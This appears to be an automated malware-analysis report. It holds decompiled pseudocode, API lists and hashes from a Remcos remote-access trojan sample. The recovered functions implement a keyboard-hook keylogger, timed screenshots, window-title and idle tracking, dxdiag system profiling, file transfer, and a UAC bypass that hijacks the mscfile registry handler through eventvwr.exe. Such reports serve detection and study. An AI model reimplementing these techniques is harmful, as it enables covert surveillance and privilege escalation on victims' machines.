                    					E00401EFA(0x46c898, _t132, _t141, E00414E7E(_t146 - 0x40));
                    					E00401EF0();
                    				}
                    				_t42 = E00401F95(E00401E49(0x46c578, _t132, _t150, 0x19));
                    				_t45 = E00401EEB(E004172DA(_t146 - 0x58, E00401E49(0x46c578, _t132, _t150, 0x1a)));
                    				_t134 =  *_t42;
                    				E00401EFA(0x46c880,  *_t42, 0x46c880, E0041805B(_t146 - 0x40,  *_t42, _t45));
                    				E00401EF0();
                    				E00401EF0();
                    				CreateDirectoryW(E00401EEB(0x46c880), _t92);
                    				E00401F6D(_t92, _t146 - 0xb0);
                    				E00401F6D(_t92, _t146 - 0x80);
                    				 *(_t146 - 0x11) = _t92;
                    				 *0x46bd6b = 1;
                    				_t54 =  *((intOrPtr*)(_t146 + 8));
                    				_t145 =  !=  ? L"time_%04i%02i%02i_%02i%02i%02i" : L"wnd_%04i%02i%02i_%02i%02i%02i";
                    				 *(_t146 - 0x18) =  !=  ? L"time_%04i%02i%02i_%02i%02i%02i" : L"wnd_%04i%02i%02i_%02i%02i%02i";
                    				_t140 = Sleep;
                    				L6:
                    				while(1) {
                    					if( *_t54 != 1) {
                    						L11:
                    						GetLocalTime(_t146 - 0x28);
                    						_push( *(_t146 - 0x1c) & 0x0000ffff);
                    						_push( *(_t146 - 0x1e) & 0x0000ffff);
                    						_push( *(_t146 - 0x20) & 0x0000ffff);
                    						_push( *(_t146 - 0x22) & 0x0000ffff);
                    						_push( *(_t146 - 0x26) & 0x0000ffff);
                    						E00414398(_t146 - 0x2b8, _t145,  *(_t146 - 0x28) & 0x0000ffff);
                    						_t147 = _t147 + 0x20;
                    						E00401EFA(_t146 - 0x80, _t66, _t145, E004030A6(_t92, _t146 - 0x58, E004030A6(_t92, _t146 - 0x40, E00407514(_t146 - 0x98, 0x46c880, __eflags, "\\"), _t140, __eflags, _t146 - 0x2b8), _t140, __eflags, "."));
                    						E00401EF0();
                    						E00401EF0();
                    						E00401EF0();
                    						_t72 = E00401EEB(_t146 - 0x80);
                    						_t134 =  *((intOrPtr*)( *((intOrPtr*)(_t146 + 8)) + 1));
                    						E0041576E(_t72,  *((intOrPtr*)( *((intOrPtr*)(_t146 + 8)) + 1)), __eflags);
                    						__eflags =  *((char*)( *((intOrPtr*)(_t146 + 8))));
                    						if(__eflags != 0) {
                    							_t92 = 0;
                    							 *(_t146 - 0x11) = 0;
                    							_t78 = E00436769(_t75, E00401F95(E00401E49(0x46c578, _t134, __eflags, 0x18))) * 0x3e8;
                    							__eflags = _t78;
                    						} else {
                    							_t78 = E00436769(_t79, E00401F95(E00401E49(0x46c578, _t134, __eflags, 0x15))) * 0xea60;
                    						}
                    						Sleep(_t78);
                    						_t54 =  *((intOrPtr*)(_t146 + 8));
                    						continue;
                    					}
                    					_t145 = L"wnd_%04i%02i%02i_%02i%02i%02i";
                    					 *(_t146 - 0x18) = L"wnd_%04i%02i%02i_%02i%02i%02i";
                    					while(1) {
                    						_t153 = _t92;
                    						if(_t92 != 0) {
                    							goto L11;
                    						}
                    						_t83 = E00401F95(E00401E49(0x46c578, _t134, _t153, 0x17));
                    						_t148 = _t147 - 0x18;
                    						E0040427F(_t92, _t148, _t83);
                    						_t85 = E00417ABF(0, _t134);
                    						_t147 = _t148 + 0x18;
                    						_t92 = _t85;
                    						 *(_t146 - 0x11) = _t92;
                    						if(_t92 != 0) {
                    							goto L11;
                    						}
                    						Sleep(0x3e8);
                    					}
                    					goto L11;
                    				}
                    			}


                    APIs
                    • __EH_prolog.LIBCMT ref: 0041593D
                    • GdiplusStartup.GDIPLUS(0046BEA0,?,00000000), ref: 0041596F
                      • Part of subcall function 00407514: char_traits.LIBCPMT ref: 0040752F
                      • Part of subcall function 0041576E: SHCreateMemStream.SHLWAPI(00000000,00000000,png), ref: 004157C7
                      • Part of subcall function 0041576E: DeleteFileW.KERNEL32(00000000,0000001B), ref: 00415858
                    • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 004159FB
                    • Sleep.KERNEL32(000003E8), ref: 00415A81
                    • GetLocalTime.KERNEL32(?), ref: 00415A89
                    • Sleep.KERNEL32(00000000,00000018,00000000), ref: 00415B78
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: CreateSleep$DeleteDirectoryFileGdiplusH_prologLocalStartupStreamTimechar_traits
                    • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                    • API String ID: 3280235481-3790400642
                    • Opcode ID: 03a048d13560f4f4eae294d81c30bb24aac51a1c54d7f120a5e1f9e58c173b69
                    • Instruction ID: a88af923db25c08f263845cfd4b3868e06691e543411564c9f1a5e85300975ae
                    • Opcode Fuzzy Hash: 03a048d13560f4f4eae294d81c30bb24aac51a1c54d7f120a5e1f9e58c173b69
                    • Instruction Fuzzy Hash: 89517F70A002589ACB14BBB6CC529FE77699F54308F00003FF845AB1E2EF3C5E8587A9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 91%
                    			E1059A003(void* __ecx, void* __edx) {
                    				char _v28;
                    				char _v56;
                    				char _v76;
                    				char _v80;
                    				char _v100;
                    				void* _v104;
                    				char _v108;
                    				char _v112;
                    				struct HWND__* _v116;
                    				void* __ebx;
                    				void* __edi;
                    				int _t36;
                    				struct HWND__* _t42;
                    				void* _t50;
                    				int _t57;
                    				struct HWND__* _t77;
                    				void* _t119;
                    				signed int _t126;
                    				void* _t128;
                    
                    				_t112 = __edx;
                    				_t128 = (_t126 & 0xfffffff8) - 0x74;
                    				_push(_t77);
                    				_t119 = __ecx;
                    				while( *((char*)(_t119 + 0x49)) != 0 ||  *((char*)(_t119 + 0x4a)) != 0) {
                    					Sleep(0x1f4);
                    					_t77 = GetForegroundWindow();
                    					_t36 = GetWindowTextLengthW(_t77);
                    					_t4 = _t36 + 1; // 0x1
                    					E1059AC5A(_t77,  &_v100, _t112, _t119, _t4, 0);
                    					if(_t36 != 0) {
                    						_t57 = E105932F7();
                    						GetWindowTextW(_t77, E10592D59( &_v100), _t57);
                    						_t112 = 0x46dd0c;
                    						if(E1059AD1A(0x46dd0c) == 0) {
                    							E1059AC40(0x46dd0c,  &_v100);
                    							E105981AD(E105932F7() - 1);
                    							_t128 = _t128 - 0x18;
                    							_t137 =  *0x46c39b;
                    							if( *0x46c39b == 0) {
                    								_t112 = E1059ACD7( &_v76, 0x45f9a0, __eflags,  &_v108);
                    								E10593F14(_t77, _t128, _t67, _t119, __eflags, 0x45f994);
                    								E105999EE(_t119);
                    								E10592D5E();
                    							} else {
                    								E105981BE(_t77, _t128, 0x46dd0c, _t137,  &_v108);
                    								E1059A4A2(_t77, _t119, _t137);
                    							}
                    						}
                    					}
                    					_t83 = _t119;
                    					E1059AA83(_t119);
                    					if(E105A8044(_t119) < 0xea60) {
                    						L18:
                    						E10592D5E();
                    						continue;
                    					} else {
                    						_t77 = _v116;
                    						while( *((char*)(_t119 + 0x49)) != 0 ||  *((char*)(_t119 + 0x4a)) != 0) {
                    							_t42 = E105A8044(_t83);
                    							if(_t42 < 0xea60) {
                    								__eflags = _t77 % 0xea60;
                    								E105CC93C(_t83, _t77 / 0xea60,  &_v112, 0xa);
                    								_t50 = E105961B1(_t77,  &_v80, E10598430(_t77,  &_v56, 0x45f9bc, _t119, __eflags, E10592EF2(_t77,  &_v28,  &_v112)), _t119, __eflags, 0x45f9ac);
                    								_t128 = _t128 + 0xc - 0x14;
                    								_t112 = _t50;
                    								E105A8148(_t128, _t50);
                    								E105999EE(_t119);
                    								E10592E35();
                    								E10592E35();
                    								E10592E35();
                    								goto L18;
                    							}
                    							_t77 = _t42;
                    							_v116 = _t77;
                    							Sleep(0x3e8);
                    						}
                    						E10592D5E();
                    						break;
                    					}
                    				}
                    				__eflags = 0;
                    				return 0;
                    			}


                    APIs
                    • __Init_thread_footer.LIBCMT ref: 1059A065
                    • Sleep.KERNEL32(000001F4), ref: 1059A070
                    • GetForegroundWindow.USER32 ref: 1059A076
                    • GetWindowTextLengthW.USER32(00000000), ref: 1059A07F
                    • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 1059A0B3
                    • Sleep.KERNEL32(000003E8), ref: 1059A181
                      • Part of subcall function 1059ACD7: char_traits.LIBCPMT ref: 1059ACE7
                      • Part of subcall function 105999EE: SetEvent.KERNEL32(?,?,?,?,1059AB6A,?,?,?,?,?,00000000), ref: 10599A1B
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: Window$SleepText$EventForegroundInit_thread_footerLengthchar_traits
                    • String ID: [ ${ User has been idle for
                    • API String ID: 107669343-2826099043
                    • Opcode ID: 1d10f816b4d0705a402c55ee7833fa14927a43ca18894bfe59249b7e6b762fd9
                    • Instruction ID: f0dda9af3b36aabd1605fc0563ad3125f8a290807b47a7a0eb52c883e413bdca
                    • Opcode Fuzzy Hash: 1d10f816b4d0705a402c55ee7833fa14927a43ca18894bfe59249b7e6b762fd9
                    • Instruction Fuzzy Hash: 5651C375A047419BCB04EB64D88EA7E7FA9EFC4340F40052DF446862A1EF74BE49C7A6
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0045067F), ref: 0044FB57
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: DecodePointer
                    • String ID: acos$asin$exp$log$log10$pow$sqrt
                    • API String ID: 3527080286-3064271455
                    • Opcode ID: 07e362d0d19a8e529bd48a8390fa6bde691843f4e6f9b00163a6e45181fcf7c8
                    • Instruction ID: 6d1d00b5fa5106008f140815deedb413f1269aff938fee9e8c4187f401118692
                    • Opcode Fuzzy Hash: 07e362d0d19a8e529bd48a8390fa6bde691843f4e6f9b00163a6e45181fcf7c8
                    • Instruction Fuzzy Hash: A6515E70900A0DCBEF009F58E9885ADBBB4FB09305F6441A7D881A7755CB799D2D8B1E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 76%
                    			E00413673(void* __ecx, void* __eflags, char _a4) {
                    				char _v28;
                    				char _v52;
                    				char _v76;
                    				char _v180;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				void* _t35;
                    				void* _t46;
                    				void* _t54;
                    				void* _t55;
                    				void* _t90;
                    				void* _t92;
                    				void* _t94;
                    				void* _t95;
                    
                    				_t97 = __eflags;
                    				E004030A6(_t54,  &_v76, E0040427F(_t54,  &_v52, E0043987F(_t54, __ecx, __eflags, L"temp")), _t90, _t97, L"\\sysinfo.txt");
                    				E00401EF0();
                    				_t55 = 0;
                    				ShellExecuteW(0, L"open", L"dxdiag", E00401EEB(E00409E69( &_v52, L"/t ", 0,  &_v76)), 0, 0);
                    				E00401EF0();
                    				E004020D5(0,  &_v28);
                    				_t92 = 0;
                    				do {
                    					_t35 = E00401EEB( &_v76);
                    					_t87 =  &_v28;
                    					E004179DC(_t35,  &_v28);
                    					Sleep(0x64);
                    					_t92 = _t92 + 1;
                    				} while (E00409DB5() != 0 && _t92 < 0x4b0);
                    				if(E00409DB5() == 0) {
                    					DeleteFileW(E00401EEB( &_v76));
                    					E0040484E(_t55,  &_v180, 1);
                    					_t95 = _t94 - 0x10;
                    					_t93 = 0x46bacc;
                    					asm("movsd");
                    					asm("movsd");
                    					asm("movsd");
                    					asm("movsd");
                    					_t46 = E00404A08(_t87);
                    					_t102 = _t46;
                    					if(_t46 != 0) {
                    						_t93 = _t95 - 0x18;
                    						E00402F93(_t55, _t95 - 0x18, E00402FB7( &_v52,  &_a4, 0x46c238), _t102,  &_v28);
                    						_push(0x97);
                    						E00404AA4(_t55,  &_v180, _t49, _t102);
                    						E00401FC7();
                    						E00404E0B( &_v180);
                    						_t55 = 1;
                    					}
                    					E00404E2F(_t55,  &_v180, _t93);
                    				}
                    				E00401FC7();
                    				E00401EF0();
                    				E00401FC7();
                    				return _t55;
                    			}

                    APIs
                      • Part of subcall function 00409E69: char_traits.LIBCPMT ref: 00409E79
                    • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 004136D4
                      • Part of subcall function 004179DC: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000,00000000,00000000,?,004136FE), ref: 004179F9
                    • Sleep.KERNEL32(00000064), ref: 00413700
                    • DeleteFileW.KERNEL32(00000000), ref: 00413734
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: File$CreateDeleteExecuteShellSleepchar_traits
                    • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                    • API String ID: 2701014334-2001430897
                    • Opcode ID: 73c228e22164e707defba6c5d99ea6be7ade642241f0467bdf332521333aaa0d
                    • Instruction ID: f4a0078ff742d4c0d57fd8ead3e50225e02e9f8c908c9e0bc41a8f95a638bb01
                    • Opcode Fuzzy Hash: 73c228e22164e707defba6c5d99ea6be7ade642241f0467bdf332521333aaa0d
                    • Instruction Fuzzy Hash: 15316F719102095BCB14FBA5DC92AEE7735AF50308F40007FF905771D2EF785E498A99
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 89%
                    			E004062D8(intOrPtr __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, char _a12) {
                    				intOrPtr _v8;
                    				char _v12;
                    				intOrPtr _v16;
                    				void* _v20;
                    				long _v24;
                    				char _v48;
                    				char _v72;
                    				void _v100076;
                    				void* __ebx;
                    				void* _t37;
                    				WCHAR* _t39;
                    				long _t46;
                    				struct _OVERLAPPED* _t58;
                    				intOrPtr _t77;
                    				long _t81;
                    				void* _t82;
                    				void* _t84;
                    				void* _t87;
                    
                    				E00450D30();
                    				_t74 =  &_a12;
                    				asm("xorps xmm0, xmm0");
                    				_v16 = __ecx;
                    				_t58 = 0;
                    				asm("movlpd [ebp-0x8], xmm0");
                    				_v24 = 0;
                    				E0040331A(0,  &_v48, __eflags, E00407514( &_v72,  &_a12, __eflags, L".part"));
                    				E00401EF0();
                    				_t37 = CreateFileW(E00401EEB( &_v48), 4, 0, 0, 2, 0x80, 0);
                    				_v20 = _t37;
                    				_t84 = _v8 - _a8;
                    				if(_t84 > 0) {
                    					L8:
                    					CloseHandle(_t37);
                    					_t39 = E00401EEB( &_a12);
                    					MoveFileW(E00401EEB( &_v48), _t39);
                    					_t58 = 1;
                    				} else {
                    					_t77 = _a4;
                    					if(_t84 < 0) {
                    						goto L3;
                    					} else {
                    						_t85 = _v12 - _t77;
                    						if(_v12 >= _t77) {
                    							goto L8;
                    						} else {
                    							while(1) {
                    								L3:
                    								_t46 = E00404B5A( &_v100076, 0x186a0);
                    								_t81 = _t46;
                    								asm("cdq");
                    								_v12 = _v12 + _t46;
                    								asm("adc [ebp-0x4], edx");
                    								WriteFile(_v20,  &_v100076, _t81,  &_v24, _t58);
                    								_t82 = _t82 - 0x18;
                    								E004020AB(_t58, _t82, _t74, _t85,  &_v12, 8);
                    								E00404AA4(_t58, _v16, _t74, _t85, 0x57, _v16);
                    								if(_t81 <= 0) {
                    									break;
                    								}
                    								_t87 = _v8 - _a8;
                    								if(_t87 < 0 || _t87 <= 0 && _v12 < _t77) {
                    									continue;
                    								} else {
                    									_t37 = _v20;
                    									goto L8;
                    								}
                    								goto L9;
                    							}
                    							CloseHandle(_v20);
                    							DeleteFileW(E00401EEB( &_v48));
                    						}
                    					}
                    				}
                    				L9:
                    				E00401EF0();
                    				E00401EF0();
                    				return _t58;
                    			}

                    APIs
                      • Part of subcall function 00407514: char_traits.LIBCPMT ref: 0040752F
                    • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,[Info],00000000,0046C238,?,00406EAD,00000000), ref: 00406331
                    • WriteFile.KERNEL32(?,?,00000000,00406EAD,00000000,?,000186A0,00406EAD,?,00406EAD,00000000,?,?,0000000A,00000000), ref: 00406379
                    • CloseHandle.KERNEL32(00000000,?,00406EAD,00000000,?,?,0000000A,00000000), ref: 004063B3
                    • MoveFileW.KERNEL32(00000000,00000000), ref: 004063CB
                    • CloseHandle.KERNEL32(?,00000057,?,00000008,?,?,?,?,?,?,?,?,00000000), ref: 004063EF
                    • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004063FE
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: File$CloseHandle$CreateDeleteMoveWritechar_traits
                    • String ID: .part$[Info]
                    • API String ID: 820096542-3571004685
                    • Opcode ID: 6bba8ed261c54de0a3e46f9af7c2b96e1411d84e0282c2609a9fbc3a0de2b4db
                    • Instruction ID: 68dcce1d93323748b1337c278f552d509b85ae635904d8fd02d733045cb5952f
                    • Opcode Fuzzy Hash: 6bba8ed261c54de0a3e46f9af7c2b96e1411d84e0282c2609a9fbc3a0de2b4db
                    • Instruction Fuzzy Hash: E3314F71D00219ABCB00EFA5CC959EEB77DEF44345F10857AFD11B3191DA786A44CBA8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 75%
                    			E00405F77(void* __ebx, void* __ecx, void* __edx) {
                    				char _v28;
                    				char _v52;
                    				void* _t8;
                    				void* _t10;
                    				void* _t11;
                    				void* _t12;
                    				void* _t14;
                    				void* _t21;
                    				void* _t24;
                    				void* _t28;
                    				void* _t50;
                    
                    				_t28 = __ecx;
                    				if( *0x46a9d0 != 0) {
                    					return 1;
                    				}
                    				_t8 = E00406115(__ecx);
                    				__eflags = _t8 - 0x3a9f;
                    				if(_t8 < 0x3a9f) {
                    					_push(_t28);
                    					E004108E2( &_v28, 0x80000000, "mscfile\\shell\\open\\command", 0x45f6bc);
                    					_t10 = E00402489();
                    					_t11 = E00401F95(0x46c560);
                    					_t12 = E00402489();
                    					_t14 = E00401F95( &_v28);
                    					E00410C80(E00401F95(0x46c518), __eflags, "origmsc", _t14, _t12 + 1, _t11, _t10);
                    					_push(2);
                    					E0040427F(__ebx, _t50 + 0x18 - 0x18, "C:\Windows\SysWOW64\DpiScaling.exe");
                    					_push(0x45f724);
                    					E00410B4C(0x80000001, L"Software\\Classes\\mscfile\\shell\\open\\command");
                    					E0041800F( &_v52, 0x34, "eventvwr.exe");
                    					_t21 = ShellExecuteW(0, L"open", E00401EEB( &_v52), 0x45f724, 0x45f724, 0);
                    					__eflags = _t21 - 0x20;
                    					if(_t21 <= 0x20) {
                    						E00401EF0();
                    						E00401FC7();
                    						_t24 = 2;
                    						return _t24;
                    					}
                    					ExitProcess(0);
                    				}
                    				return _t8;
                    			}

                    APIs
                    • ShellExecuteW.SHELL32(00000000,open,00000000,0045F724,0045F724,00000000), ref: 00406046
                    • ExitProcess.KERNEL32 ref: 00406053
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: ExecuteExitProcessShell
                    • String ID: C:\Windows\SysWOW64\DpiScaling.exe$Software\Classes\mscfile\shell\open\command$eventvwr.exe$mscfile\shell\open\command$open$origmsc
                    • API String ID: 1124553745-1249179971
                    • Opcode ID: 27e401ceed7da1652196baaf86b17bc50b6b95780435188a7ff36ccb26008351
                    • Instruction ID: f05824e85f8be17fa5162dcfa478c8361fedc00b155675f1e07b0ba7c405f635
                    • Opcode Fuzzy Hash: 27e401ceed7da1652196baaf86b17bc50b6b95780435188a7ff36ccb26008351
                    • Instruction Fuzzy Hash: CE11F071A501056AD704B2A1CC57FBF36599B0470AF20003FF906BA1E3EFAC194986EF
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 91%
                    			E0040EAF4(void* __ebx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4) {
                    				void* _v8;
                    				char _v12;
                    				char _v28;
                    				intOrPtr _v36;
                    				intOrPtr* _t34;
                    				void* _t39;
                    				intOrPtr* _t41;
                    				intOrPtr* _t42;
                    
                    				E00430058( &_v12, 0);
                    				_t39 =  *0x46db88;
                    				_v8 = _t39;
                    				_t41 = E0040BA23(_a4, E0040B94C(0x46dd40));
                    				if(_t41 != 0) {
                    					L5:
                    					E004300B0( &_v12);
                    					return _t41;
                    				} else {
                    					if(_t39 == 0) {
                    						__eflags = E0040EBBB(__ebx, __edx,  &_v8, _a4) - 0xffffffff;
                    						if(__eflags == 0) {
                    							_t9 =  &_v28; // 0x40e459
                    							_t34 = _t9;
                    							E0040B812(_t34);
                    							_t10 =  &_v28; // 0x40e459
                    							E0043205A(_t10, 0x46864c);
                    							asm("int3");
                    							_push(_t41);
                    							_t42 = _t34;
                    							E0040B6F3(_t34, _v36);
                    							 *_t42 = 0x454290;
                    							return _t42;
                    						} else {
                    							_t41 = _v8;
                    							 *0x46db88 = _t41;
                    							 *((intOrPtr*)( *_t41 + 4))();
                    							E00430269(__eflags, _t41);
                    							goto L5;
                    						}
                    					} else {
                    						_t41 = _t39;
                    						goto L5;
                    					}
                    				}
                    			}

                    APIs
                    • std::_Lockit::_Lockit.LIBCPMT ref: 0040EB01
                    • int.LIBCPMT ref: 0040EB14
                      • Part of subcall function 0040B94C: std::_Lockit::_Lockit.LIBCPMT ref: 0040B95D
                      • Part of subcall function 0040B94C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040B977
                    • std::locale::_Getfacet.LIBCPMT ref: 0040EB1D
                    • std::_Facet_Register.LIBCPMT ref: 0040EB54
                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0040EB5D
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0040EB7B
                    • std::exception::exception.LIBCMT ref: 0040EB8A
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::exception::exceptionstd::locale::_
                    • String ID: Y@
                    • API String ID: 2287991272-2491949953
                    • Opcode ID: b3c60572cbba6ae54a95adab48ee80ddae508a23bb924de11908aa76d51c0c2e
                    • Instruction ID: ff1561f7ec47bfe26f0684d44a3055bc139d2b5ebdf4a0be2619b31cd2ef7e2e
                    • Opcode Fuzzy Hash: b3c60572cbba6ae54a95adab48ee80ddae508a23bb924de11908aa76d51c0c2e
                    • Instruction Fuzzy Hash: 6411E232A00218ABCB14FBAAE80199EB778DF40764F10057BF90577291EB78AE0187DD
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 90%
                    			E00408892(struct HHOOK__** __ecx) {
                    				struct tagMSG _v32;
                    				char _v60;
                    				void* _v64;
                    				void* __edi;
                    				int _t7;
                    				void* _t8;
                    				struct HHOOK__* _t14;
                    				void* _t16;
                    				void* _t22;
                    				struct HHOOK__** _t34;
                    				signed int _t36;
                    				void* _t38;
                    
                    				_t38 = (_t36 & 0xfffffff8) - 0x38;
                    				_t34 = __ecx;
                    				 *0x46baf0 = __ecx;
                    				if( *((intOrPtr*)(__ecx)) != 0) {
                    					goto L3;
                    				} else {
                    					_t14 = SetWindowsHookExA(0xd, E0040887B, GetModuleHandleA(0), 0);
                    					 *_t34 = _t14;
                    					_t43 = _t14;
                    					if(_t14 != 0) {
                    						while(1) {
                    							L3:
                    							_t7 = GetMessageA( &_v32, 0, 0, 0);
                    							__eflags = _t7;
                    							if(_t7 == 0) {
                    								break;
                    							}
                    							TranslateMessage( &_v32);
                    							DispatchMessageA( &_v32);
                    							__eflags =  *_t34;
                    							if( *_t34 != 0) {
                    								continue;
                    							}
                    							break;
                    						}
                    						_t8 = 0;
                    						__eflags = 0;
                    					} else {
                    						_t16 = E00417226(_t22,  &_v60, GetLastError());
                    						_t39 = _t38 - 0x18;
                    						E004075C2(_t22, _t38 - 0x18, "Keylogger initialization failure: error ", 0, _t43, _t16);
                    						E00402084(_t22, _t39 - 0x14, "[ERROR]");
                    						E00416C80(_t22, 0);
                    						E00401FC7();
                    						_t8 = 1;
                    					}
                    				}
                    				return _t8;
                    			}

                    APIs
                    • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 004088AD
                    • SetWindowsHookExA.USER32 ref: 004088BB
                    • GetLastError.KERNEL32 ref: 004088C7
                      • Part of subcall function 00416C80: GetLocalTime.KERNEL32(00000000), ref: 00416C9A
                    • GetMessageA.USER32 ref: 00408915
                    • TranslateMessage.USER32(?), ref: 00408924
                    • DispatchMessageA.USER32 ref: 0040892F
                    Strings
                    • [ERROR], xrefs: 004088ED
                    • Keylogger initialization failure: error , xrefs: 004088DB
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                    • String ID: Keylogger initialization failure: error $[ERROR]
                    • API String ID: 3219506041-2451335947
                    • Opcode ID: 8ea95556890b4c9da9a23e7bccd80e685f265dd08c2c7945773fe28fe98e8065
                    • Instruction ID: 34009541f3e87155e43b52d28ab51065b23688c1b97c42bbbbbfc9b875d1dcea
                    • Opcode Fuzzy Hash: 8ea95556890b4c9da9a23e7bccd80e685f265dd08c2c7945773fe28fe98e8065
                    • Instruction Fuzzy Hash: 5E11BF726002016BC3107FB69D0986B77ECEB91756B10063EF886E2191EF74C504C7AB
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00418D28(void* __eflags) {
                    				struct tagMSG _v32;
                    				char _v300;
                    				int _t14;
                    
                    				GetModuleFileNameA(0,  &_v300, 0x104);
                    				 *0x46bec4 = E00418DDA();
                    				0x46bec0->cbSize = 0x1fc;
                    				 *0x46bec8 = 1;
                    				 *0x46bed0 = 0x401;
                    				 *0x46bed4 = ExtractIconA(0,  &_v300, 0);
                    				lstrcpynA(0x46bed8, "Remcos", 0x80);
                    				 *0x46becc = 7;
                    				Shell_NotifyIconA(0, 0x46bec0);
                    				while(1) {
                    					_t14 = GetMessageA( &_v32, 0, 0, 0);
                    					if(_t14 == 0) {
                    						break;
                    					}
                    					TranslateMessage( &_v32);
                    					DispatchMessageA( &_v32);
                    				}
                    				return _t14;
                    			}
                    Instruction addresses for E00418D28 (one per source line above, non-contiguous): 0x00418d41 to 0x00418dd9

                    APIs
                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00418D41
                      • Part of subcall function 00418DDA: RegisterClassExA.USER32(00000030), ref: 00418E26
                      • Part of subcall function 00418DDA: CreateWindowExA.USER32 ref: 00418E41
                      • Part of subcall function 00418DDA: GetLastError.KERNEL32 ref: 00418E4B
                    • ExtractIconA.SHELL32(00000000,?,00000000), ref: 00418D78
                    • lstrcpynA.KERNEL32(0046BED8,Remcos,00000080), ref: 00418D92
                    • Shell_NotifyIconA.SHELL32(00000000,0046BEC0), ref: 00418DA8
                    • TranslateMessage.USER32(?), ref: 00418DB4
                    • DispatchMessageA.USER32 ref: 00418DBE
                    • GetMessageA.USER32 ref: 00418DCB
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                    • String ID: Remcos
                    • API String ID: 1970332568-165870891
                    • Opcode ID: 4432e9a92b08c743a3622aaf1068a32208a60cd4a4d0f65d04395dee408a5685
                    • Instruction ID: 5032fd3989ed38f827dead14ca6996695ce53ed1fe2f9eb900f221369ed5122d
                    • Opcode Fuzzy Hash: 4432e9a92b08c743a3622aaf1068a32208a60cd4a4d0f65d04395dee408a5685
                    • Instruction Fuzzy Hash: 38011EB1500308ABD7109FA1EC0DEDB7BBCFB85706F00406AF611D21A1EBF995858B99
                    Uniqueness

                    Uniqueness Score: -1.00%
